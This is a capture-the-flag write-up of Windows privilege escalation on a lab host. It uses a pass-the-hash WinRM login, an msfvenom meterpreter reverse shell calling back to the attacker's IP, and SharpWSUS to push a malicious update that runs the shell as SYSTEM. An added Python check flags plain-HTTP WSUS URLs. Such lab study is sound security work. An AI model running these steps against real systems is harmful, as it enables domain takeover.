# Priv Esc

```
evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
```


Reference: <https://retest.dk/wsus-local-privesc-delivery-optimization/?lang=en>

```powershell
*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ

```
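Read from the defender's side, the output above shows both `WUServer` and `WUStatusServer` pointing at plain `http://` URLs, so the update channel has no TLS. The following is an added example, not part of the original writeup: it parses collected `reg query` output and flags WSUS URLs that are not HTTPS. The function names are hypothetical and the sample is constructed from the values shown above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a subset of the WindowsUpdate policy values shown above.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ
"""

# Policy values that hold a WSUS endpoint URL.
URL_VALUES = ("WUServer", "WUStatusServer", "UpdateServiceUrlAlternate")
# reg.exe prints value lines as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)(?:\s{4}(.*))?$")


def parse_reg_query(text):
    """Return {value_name: data} for the value lines of `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line.rstrip())
        if not m:
            continue  # key path lines and blank lines
        name, reg_type, data = m.group(1), m.group(2), (m.group(3) or "").strip()
        # DWORDs are printed as hex (0x17); an empty REG_SZ has no data column.
        values[name] = int(data, 16) if reg_type == "REG_DWORD" and data else data
    return values


def plaintext_wsus_urls(values):
    """Return [(value_name, url)] for configured WSUS URLs that do not use HTTPS."""
    findings = []
    for name in URL_VALUES:
        url = values.get(name, "")
        if url and urlsplit(url).scheme.lower() != "https":
            findings.append((name, url))
    return findings


if __name__ == "__main__":
    for name, url in plaintext_wsus_urls(parse_reg_query(SAMPLE)):
        print(f"{name} is not HTTPS: {url}")
```

An empty result means every configured WSUS URL uses HTTPS; unset values such as the empty `UpdateServiceUrlAlternate` are skipped rather than flagged.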

```bash
adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

```

```bash
adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443

```

SharpWSUS: <https://github.com/nettitude/SharpWSUS>

Compile SharpWSUS, upload it, and run it:

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

```

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update

[*] Approve complete

```

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete

```
